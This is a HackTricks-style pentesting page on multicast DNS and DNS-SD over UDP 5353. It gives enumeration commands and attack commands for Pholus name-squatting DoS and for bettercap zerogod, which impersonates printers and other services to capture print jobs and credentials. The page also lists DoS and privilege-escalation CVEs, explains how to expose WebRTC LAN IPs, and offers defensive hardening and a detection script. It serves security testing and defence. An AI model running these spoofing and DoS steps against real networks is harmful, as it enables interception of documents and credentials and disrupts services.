5353/UDP Multicast DNS (mDNS) and DNS-SD

Tip

Learn and practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn and practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn and practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Basic Information

Multicast DNS (mDNS) provides DNS-like name resolution and service discovery within the local link without a unicast DNS server. It uses UDP/5353 and the multicast addresses 224.0.0.251 (IPv4) and FF02::FB (IPv6). DNS Service Discovery (DNS-SD, usually used together with mDNS) offers a standardized way to enumerate and describe services through PTR, SRV and TXT records.

PORT     STATE SERVICE
5353/udp open  zeroconf

Key protocol details you’ll often leverage during attacks:

  • Names in the .local domain are resolved via mDNS.
  • The QU (Query Unicast) bit can request a unicast response even for multicast queries.
  • Implementations should ignore packets that do not originate from the local link; some stacks still accept them.
  • Probing/announcing enforces unique host/service names; interfering at this stage creates DoS/“name squatting” conditions.

Example DNS-SD services

Services are advertised as _<service>._tcp or _<service>._udp under .local, for example _ipp._tcp.local (printers), _airplay._tcp.local (AirPlay), _adb._tcp.local (Android Debug Bridge), etc. Discover the available types with _services._dns-sd._udp.local, then resolve the instances found down to SRV/TXT/A/AAAA.

Network Scanning and Enumeration

  • nmap target scan (direct mDNS on a host):
nmap -sU -p 5353 --script=dns-service-discovery <target>
  • nmap broadcast discovery (listen to the segment and enumerate all DNS-SD types/instances):
sudo nmap --script=broadcast-dns-service-discovery
  • avahi-browse (Linux):
# List service types
avahi-browse -bt _services._dns-sd._udp
# Browse all services and resolve to host/port
avahi-browse -art
  • Apple dns-sd (macOS):
# Browse all HTTP services
dns-sd -B _http._tcp
# Enumerate service types
dns-sd -B _services._dns-sd._udp
# Resolve a specific instance to SRV/TXT
dns-sd -L "My Printer" _ipp._tcp local
  • Packet capture with tshark:
# Live capture
sudo tshark -i <iface> -f "udp port 5353" -Y mdns
# Only DNS-SD service list queries
sudo tshark -i <iface> -f "udp port 5353" -Y "dns.qry.name == \"_services._dns-sd._udp.local\""

Notes: Some browsers/WebRTC stacks use short-lived mDNS hostnames to mask local IPs. If you see random-UUID.local on the wire, resolve it via mDNS to pivot to the internal IPs.

Attacks

mDNS name probing interference (DoS / name squatting)

During the probing phase, a host verifies that its chosen name is unique. Answering with forged conflicts forces it to pick new names or to fail. This can delay or prevent service registration and discovery.

Example with Pholus:

# Block new devices from taking names by auto-faking responses
sudo python3 pholus3.py <iface> -afre -stimeout 1000

Service spoofing and impersonation (MitM)

Impersonate advertised DNS-SD services (printers, AirPlay, HTTP, file shares) so that clients connect to you. This is especially useful for:

  • Capturing documents by spoofing _ipp._tcp or _printer._tcp.
  • Luring clients to HTTP/HTTPS services to harvest tokens/cookies or deliver payloads.
  • Combining with NTLM relay techniques when Windows clients try to authenticate to the spoofed services.

With bettercap’s zerogod module (mDNS/DNS-SD spoofer/impersonator):

# Start mDNS/DNS-SD discovery
sudo bettercap -iface <iface> -eval "zerogod.discovery on"

# Show all services seen from a host
> zerogod.show 192.168.1.42
# Show full DNS records for a host (newer bettercap)
> zerogod.show-full 192.168.1.42

# Impersonate all services of a target host automatically
> zerogod.impersonate 192.168.1.42

# Save IPP print jobs to disk while impersonating a printer
> set zerogod.ipp.save_path ~/.bettercap/zerogod/documents/
> zerogod.impersonate 192.168.1.42

# Replay previously captured services
> zerogod.save 192.168.1.42 target.yml
> zerogod.advertise target.yml

See also the generic LLMNR/NBNS/mDNS/WPAD spoofing and credential capture/relay workflows:

Spoofing LLMNR, NBT-NS, mDNS/DNS and WPAD and Relay Attacks

Notes on recent implementation issues (useful for DoS/persistence during engagements)

  • Avahi reachable-assertion and D-Bus crash bugs (2023) can make avahi-daemon stop working on Linux distributions (e.g. CVE-2023-38469..38473, CVE-2023-1981), disrupting service discovery on target hosts until it is restarted.
  • Cisco IOS XE Wireless LAN Controller mDNS gateway DoS (CVE-2024-20303) lets adjacent WLAN clients send crafted mDNS traffic that raises WLC CPU load and tears down AP tunnels; relevant if you need to force client roaming or controller resets during an engagement.
  • Apple mDNSResponder logic error DoS (CVE-2024-44183) lets a sandboxed local process briefly crash Bonjour and thereby halt service publication/lookup on Apple endpoints; patched in recent iOS/macOS releases.
  • Apple mDNSResponder correctness issue (CVE-2025-31222) allowed local privilege escalation via mDNSResponder; usable for persistence on unmanaged Macs/iPhones, fixed in recent iOS/macOS updates.

Browser/WebRTC mDNS considerations

Modern Chromium/Firefox hide host candidates behind ephemeral mDNS names. On managed endpoints you can re-expose LAN IPs by pushing the Chrome policy WebRtcLocalIpsAllowedUrls (or by toggling chrome://flags/#enable-webrtc-hide-local-ips-with-mdns / the Edge equivalent) so that ICE exposes host candidates instead of mDNS names; set it under HKLM\Software\Policies\Google\Chrome.

When users disable the protection by hand (common in WebRTC troubleshooting guides), their browsers again advertise plain host candidates, which you can capture via mDNS or ICE signaling to speed up host discovery.

Defensive considerations and OPSEC

  • Segment boundaries: Do not route 224.0.0.251/FF02::FB between security zones unless an mDNS gateway is explicitly required. If discovery must be bridged, use allowlists and rate limits.
  • Windows endpoints/servers:
      • To fully disable name resolution via mDNS, set the registry value and then reboot:
        HKLM\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\EnableMDNS = 0 (DWORD)
      • In managed environments, disable the built-in Windows Defender Firewall rule “mDNS (UDP-In)” (at least on the Domain profile) to block inbound mDNS processing while keeping home/roaming functionality.
      • On newer Windows 11 builds/GPO templates, use the policy “Computer Configuration > Administrative Templates > Network > DNS Client > Configure multicast DNS (mDNS) protocol” and set it to Disabled.
  • Linux (Avahi):
      • Lock down publishing when it is not needed: set disable-publishing=yes, and restrict interfaces with allow-interfaces= / deny-interfaces= in /etc/avahi/avahi-daemon.conf.
      • Consider setting check-response-ttl=yes and avoid enable-reflector=yes unless strictly required; prefer reflect-filters= allowlists when you do reflect.
  • macOS: Block inbound mDNS on host/network firewalls where Bonjour discovery is not needed for specific subnets.
  • Monitoring: Alert on unusual rates of _services._dns-sd._udp.local queries or sudden changes in the SRV/TXT records of critical services; these are indicators of spoofing or service impersonation.
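An added example (not from the page or any tool it mentions) of the monitoring idea in the last bullet: a minimal mDNS SRV parser that records which host/port each DNS-SD instance resolves to and raises an alert when an already-seen instance is re-announced elsewhere, the pattern left behind by the impersonation attacks described above. The packets, instance name and hostnames are constructed for the demonstration.

```python
import struct

def encode_name(name):  # DNS wire format: length-prefixed labels ending with a zero byte
    return b"".join(bytes([len(l)]) + l.encode() for l in name.rstrip(".").split(".")) + b"\x00"

def build_srv_response(instance, port, target, ttl=120):
    # Constructed mDNS response: QR=1, AA=1, one SRV (type 33) answer with the cache-flush bit set
    rdata = struct.pack("!HHH", 0, 0, port) + encode_name(target)  # priority, weight, port, target
    header = struct.pack("!HHHHHH", 0, 0x8400, 0, 1, 0, 0)
    return header + encode_name(instance) + struct.pack("!HHIH", 33, 0x8001, ttl, len(rdata)) + rdata

def read_name(pkt, off):  # decode a (possibly compressed) name -> (name, offset just past it)
    labels, end = [], None
    while (n := pkt[off]) != 0:
        if n & 0xC0 == 0xC0:                               # compression pointer (RFC 1035 4.1.4)
            end = off + 2 if end is None else end
            off = struct.unpack("!H", pkt[off:off + 2])[0] & 0x3FFF
        else:
            labels.append(pkt[off + 1:off + 1 + n].decode())
            off += 1 + n
    return ".".join(labels).lower(), (end if end is not None else off + 1)

def parse_srv_answers(pkt):
    # Return {instance: (port, target)} for every SRV record in the answer section
    qd, an = struct.unpack("!HH", pkt[4:8])
    off, out = 12, {}
    for _ in range(qd):                                    # skip questions: name + type + class
        off = read_name(pkt, off)[1] + 4
    for _ in range(an):
        name, off = read_name(pkt, off)
        rtype, _, _, rdlen = struct.unpack("!HHIH", pkt[off:off + 10])
        off += 10
        if rtype == 33:                                    # port at rdata+4, target name at rdata+6
            out[name] = (struct.unpack("!H", pkt[off + 4:off + 6])[0], read_name(pkt, off + 6)[0])
        off += rdlen
    return out

def detect_srv_changes(packets, baseline=None):
    # Alert whenever an already-seen instance is announced with a different host/port
    seen, alerts = dict(baseline or {}), []
    for pkt in packets:
        for name, srv in parse_srv_answers(pkt).items():
            if name in seen and seen[name] != srv:
                alerts.append((name, seen[name], srv))
            seen[name] = srv
    return alerts

# Constructed sample: the printer announces itself, then the same instance is re-announced from another host
SAMPLE = [build_srv_response("Printer._ipp._tcp.local", 631, "printer.local"),
          build_srv_response("Printer._ipp._tcp.local", 631, "laptop-42.local")]
```

In practice you would feed `detect_srv_changes` with the payloads of UDP/5353 datagrams captured on the segment (for example from the tshark filters above) and seed `baseline` with the SRV targets of the services you care about.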

Tooling quick reference

  • nmap NSE: dns-service-discovery and broadcast-dns-service-discovery.
  • Pholus: active scan, reverse mDNS sweeps, DoS and spoofing helpers.
# Passive sniff (timeout seconds)
sudo python3 pholus3.py <iface> -stimeout 60
# Enumerate service types
sudo python3 pholus3.py <iface> -sscan
# Send generic mDNS requests
sudo python3 pholus3.py <iface> --request
# Reverse mDNS sweep of a subnet
sudo python3 pholus3.py <iface> -rdns_scanning 192.168.2.0/24
  • bettercap zerogod: discover, save, advertise, and impersonate mDNS/DNS-SD services (see examples above).

Spoofing/MitM

The most interesting attack you can perform against this service is a MitM of the communication between the client and the real server. You may obtain sensitive files (MitM the communication with a printer) or even credentials (Windows authentication).
For more information see:

Spoofing LLMNR, NBT-NS, mDNS/DNS and WPAD and Relay Attacks
